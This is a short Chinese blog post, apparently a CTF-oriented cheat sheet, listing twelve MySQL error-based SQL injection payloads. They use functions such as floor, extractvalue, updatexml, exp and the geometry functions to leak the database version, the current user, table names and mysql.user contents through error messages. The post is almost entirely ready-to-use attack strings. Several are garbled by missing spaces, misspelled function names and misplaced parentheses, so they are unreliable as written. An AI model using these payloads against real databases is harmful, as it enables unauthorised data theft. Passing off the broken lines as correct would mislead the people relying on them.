[CTF知识] SQL注入12个报错方式

小帅帅 32448 0

1、通过floor报错,注入语句如下:

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2、通过ExtractValue报错,注入语句如下:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

3、通过UpdateXml报错,注入语句如下:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

4、通过NAME_CONST报错,注入语句如下:

and exists(select*from (select*from(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

5、通过join报错,注入语句如下:

select * from(select * from mysql.user ajoin mysql.user b)c;

6、通过exp报错,注入语句如下:

and exp(~(select * from (select user () ) a) );

7、通过GeometryCollection()报错,注入语句如下:

and GeometryCollection(()select *from(select user () )a)b );

8、通过polygon ()报错,注入语句如下:

and polygon (()select * from(select user ())a)b );

9、通过multipoint ()报错,注入语句如下:

and multipoint (()select * from(select user() )a)b );

10、通过multlinestring ()报错,注入语句如下:

and multlinestring (()select * from(selectuser () )a)b );

11、通过multpolygon ()报错,注入语句如下:

and multpolygon (()select * from(selectuser () )a)b );

12、通过linestring ()报错,注入语句如下:

and linestring (()select * from(select user() )a)b );

热门推荐:

云备份是什么意思,网站怎么备份?

学seo从哪些方面可以入手

2019年8月12日今日简报【微语简报】

Evercore上调苹果目标价,分析师:苹果将给投资者带来惊喜

深圳SEO想要出效果?网站上线后必做的几件事

你的隐私还安全吗?央视曝光针孔摄像头乱象

国家5G推进组:华为巴龙5000芯片率先完成全部测试

AMD 二代锐龙开始降价:八核R7 2700X已降到200美元

章子欣死因公布!微博上,一对情侣发出2年前偶遇她的照片,泪奔……

华为高管:已与巴西4家主要运营商成功测试5G

标签: 网站安全 SQL注入

发表评论 (已有0条评论)

还木有评论哦,快来抢沙发吧~